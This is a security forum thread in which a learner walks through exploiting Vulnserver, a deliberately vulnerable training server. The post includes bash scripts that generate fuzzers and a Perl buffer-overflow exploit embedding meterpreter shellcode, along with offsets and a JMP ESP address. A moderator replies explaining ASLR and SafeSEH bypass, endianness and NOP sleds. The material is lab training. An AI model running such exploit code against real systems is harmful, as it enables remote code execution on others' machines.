Results 1 to 2 of 2

Thread: Vulnserver And Ollydbg, I Need Some Help With Seh Chains

  1. #1
    Just burned his ISO
    Join Date
    May 2011
    Posts
    12

    Default Vulnserver And Ollydbg, I Need Some Help With Seh Chains

    Lately I have been learning about writing your own exploits using Steve Bradshaw's vulnserver. For those who are unfamiliar, it is a Telnet server that is purposely vulnerable to exploitation. I wrote 1 exploit for it but, I was hoping that someone could point me in the right direction for a couple other exploitation methods that I am having trouble with. I will make these questions red so it's easier to find.

    I'll start by telling you what I learned so that way there is no miscommunication.

    First off, we use spike, which is a general fuzzer, to push random buffer lengths into a command. We set the command that we want to use by setting the header. Next we just make a string variable to hold our random buffer value and we are off. (PS. I also wrote a BASH script to pump out these scripts because I am lazy)

    Code:
    #! /bin/bash
    echo "Creates a fuzzer script for spike"
    echo "Usage: ./createfuzzscipt.sh [file] [command]"
    if [ $# -ne 2 ]
    	then
    	  echo "WRONG ARGS!"
    
    else
    	touch $1
    	echo "s_readline();" > $1
    	echo "s_string(\"$2 \");" >> $1
    	echo "s_string_variable(\"COMMAND\");" >> $1
    
    	cat $1
    
    	echo "Happy Fuzzing"
    fi
    Pretty simple so far. So next we fuzz the target command using spike's general_send_tcp program. If it crashes it is possible that it is vulnerable to attack. We use wireshark to trace back the packets, vulnserver tells you if the command complete successfully or not. We look for TCP streams that don't have that at the end. I was doing this for the TRUN command which happens to crash around 5000 bytes.

    Now we need to write a Perl script to fuzz the target more intelligently. (I also wrote a BASH script to pump these out for me since, yet again, I am lazy.)
    Code:
    #! /bin/bash
    echo "This script will generate a Perl scrip used for general fuzzing"
    echo "Be nice to it, it's still in it\'s beta stages"
    echo "USAGE: ./createplfuzz.sh [file]"
    echo " " 
    echo "What do you want the header to be?"
    read header
    echo "How big should the junk size be?"
    read junksize
    echo "IP address? (Say \$ARGV[0] to make it ask)"
    read ip
    echo "Port? (Say \$ARGV[1] to make it ask)"
    read port
    
    echo "Beginning Perl Script Maker"
    
    echo '#! /usr/bin/perl' > $1
    echo 'use IO::Socket;' >> $1
    echo "\$header = \"$header\";" >> $1
    junk=`/pentest/exploits/framework/tools/pattern_create.rb $junksize`
    echo "\$junk = \"$junk\";" >> $1
    echo '$socket = IO::Socket::INET->new(' >> $1
    echo 'Proto => "tcp",' >> $1
    echo "PeerAddr => \"$ip\"," >> $1
    echo "PeerPort => \"$port\"," >> $1
    echo ');' >> $1
    echo '$socket->recv($serverdata, 1024);' >> $1
    echo 'print $serverdata;' >> $1
    echo "\$socket->send(\$header.\$junk);" >> $1	
    
    echo "DONE!"
    cat $1
    chmod +x $1
    echo "Happy Fuzzing"
    So basically a quick look at what is going on. /pentest/exploits/framework/tools/pattern_create.rb $junksize runs a command that creates a traceable pattern so if we overwrite EIP we can use this to trace EIP back and see how many bytes it took to crash it. The header is the command. Next I open ollyDbg on vulnserver and run vulnserver. Then I use my newly created fuzzing script to crash the program, I then take the value of EIP, pop it into the tracing program, and find that it is 2003 bytes in (I am still talking about the TRUN command.)

    I pretty much understand everything up to this point, however I am a little fuzzy on the next part :/

    Next we write our exploit.
    Basically we just fill in that 2003 character space with junk values (For debigging purposes I just use 'A' (\x41))
    Next we grab a JMP ESP command from a dll it loads. The reason we do this is because most dlls won't be compiled with ASLR or SafeSEH. Beyond that I don't have a clue why we need this. This is one question I'd love answered. Then we pack the value into Little Endian format. I understand what Little Endian format is but, I don't understand why we need to pack the value like that. The line is
    Code:
    $eip = pack('V', "0x625011af)
    Next we insert our shellcode (I wrote a script to just grab a meterpreter payload and insert it here. The script is at the end of this section)
    Next we make a NOP sled. I understand why we use it, however, the tutorial I used for this didn't explain how he arrived at the amount of NOPs he did (He used 20). How do you know how many NOPs to use for your sled? Lastly, we just send it over the wire.
    Code:
    $socket->send($header.$junk.$eip.$nop.$shellcode);
    Here is the Perl Exploit generation script.
    Code:
    #! /bin/bash
    echo "This script will generate a Perl script used for exploit dev and testing"
    echo "Be nice to it, it's still in it's beta stages"
    echo "USAGE: ./createplexploit.sh [file]"
    echo " " 
    echo "What do you want the header to be?"
    read header
    echo "How big should the junk size be?"
    read junksize
    echo "What is the EIP value?"
    read eip
    echo "How many NOPs should the sled contain?"
    read nop
    echo "What payload should we use?"
    read payload
    echo "What encoder should we use?"
    read encoder
    echo "What options do we want for the payload (You should know these"
    read ploptions
    echo "IP address? (Say \$ARGV[0] to make it ask)"
    read ip
    echo "Port? (Say \$ARGV[1] to make it ask)"
    read port
    
    echo "Beginning Perl Script Maker"
    
    echo '#! /usr/bin/perl' > $1
    echo 'use IO::Socket;' >> $1
    echo "\$header = \"$header\";" >> $1
    echo "\$junk = \"\\x41\" x $junksize;" >> $1
    echo "\$eip = pack('V', $eip);" >> $1
    echo "\$nop = \"\\x90\" x $nop;" >> $1
    shellcode=`msfpayload $payload $ploptions EXITFUNC=seh R | msfencode -t perl -e $encoder | grep -e '"'`
    echo "\$shellcode = $shellcode" >> $1
    echo '$socket = IO::Socket::INET->new(' >> $1
    echo 'Proto => "tcp",' >> $1
    echo "PeerAddr => \"$ip\"," >> $1
    echo "PeerPort => \"$port\"," >> $1
    echo ');' >> $1
    echo '$socket->recv($serverdata, 1024);' >> $1
    echo 'print $serverdata;' >> $1
    echo '$socket->send($header.$junk.$eip.$nop.$shellcode);' >> $1	
    
    echo "DONE!"
    cat $1
    chmod +x $1
    echo "Happy Exploiting"
    So the exploit works fine. Next, I wanted to try to make my own, however I hit some roadblocks. The command I tried to use was GMON, KSTET, and GTER. All crashed when I used spike fuzzer. However I run into the same problem with each of them. Each one has an extremely small junk space. (GMON was untraceable, I don't think it's overwriting EIP, KSTET only had 66 bytes, GTER only has 147 bytes) I noticed there isn't enough space for the shellcode. I first noticed it when I threw in some breakpoints (\xCC) to the beginning and end of the shell code. It would hit the first one but, not the 2nd. Later I just changed the shell code in my script to \x42 x 1000, I noticed not all of the Bs showed up. I know there is a couple tricks to making shellcode execute from a different location but, the one would prefer to use is over writing the SEH chains, the SEH Chains are an error handling address that gets called when the program crashes, the SEH Chains in vulnserver point to ntdll. What is the proper method for overwriting SEH and putting my shellcode in a safe place so I can execute it?

    List of questions;
    • How does the JMP ESP address from a non-ASLR dll help use execute shellcode?
    • Why do we need to pack the EIP address in little endian format?
    • How do we know how many NOPs to use in our sled?
    • What is the proper method for over writing SEH and hiding our shellcode somewhere else?

  2. #2
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: Vulnserver And Ollydbg, I Need Some Help With Seh Chains

    Hi redcodefinal

    Dont know if this forum is necessarily the right place for this type of question, since its only tangentially related to BT, however since the mods have allowed it I will answer for you.

    Beyond that I don't have a clue why we need this. This is one question I'd love answered.
    Why do we grab the address of an JMP ESP instruction from a DLL without ASLR and SafeSEH? Because they are exploit prevention techniques that can be bypassed by using DLLs compiled without them. Briefly, ASLR randomises the base address where DLLs are loaded, making it harder for us to predict where instructions located within that DLL will be located when our exploit runs. ASLR only applies when the Operating Systems and the module/dll support it (For Windows this is Vista and upwards). SafeSEH allows a module to specify a set of authorised SE handlers within that module, so that in the event of an exception only those addresses can be used to handle exceptions. This is only important on Operating Systems and modules that support SafeSEH (on Windows its XP SP2 and up) and when you are writing an SEH exploit.

    I understand what Little Endian format is but, I don't understand why we need to pack the value like that.
    It needs to be packed into little endian format because the processor reads values from the stack in little endian format, where the most significant bytes are to the right. We need to provide the address in the format the CPU is expecting.

    How do you know how many NOPs to use for your sled?
    Guestimation/trial and error

    For stack overflows, I usually start with NOP sleds of 16 to 32 bytes in size, depending on available buffer space. For most of the Vulnserver exploits, NOPsleds are not strictly necessary, I just added them so the reader can see what they are for/how they are used.

    What is the proper method for overwriting SEH and putting my shellcode in a safe place so I can execute it?
    The SEH handler on the stack sometimes gets overwritten during a stack overflow, and if you can make this happen then an SEH exploit may be possible. Vulnserver was written specifically to allow SEH overwrites to occur only in the GMON variable (see here http://resources.infosecinstitute.com/seh-exploit/), however its not probably impossible that you have caused one to occur for one of the other vulnerable commands. I can tell you however that all of the other vulnerable functions can be exploited without the use of SEH overwrites, and that is how they will be shown in future tutorials. In a few cases you need to use those tricks you referred to for executing shellcode from another location in memory (a new tutorial on one of those methods just got posted, but the formatting is still kind of rough at the moment and Im getting it sorted with the Infosec guys), and in others you will need to send the data in a particular format.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

Similar Threads

  1. Ollydbg and Winlogon.exe
    By joke2600 in forum OLD Newbie Area
    Replies: 2
    Last Post: 11-19-2009, 04:53 PM
  2. Proxy chains
    By Basic204 in forum OLD Newbie Area
    Replies: 1
    Last Post: 02-19-2009, 06:17 PM
  3. Hackers warn high street chains
    By The_Denv in forum OLD General IT Discussion
    Replies: 0
    Last Post: 04-25-2008, 10:11 PM
  4. Reverse Engineering Tool (eg Ollydbg)
    By AndiC500 in forum OLD Programming
    Replies: 4
    Last Post: 01-04-2008, 05:25 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •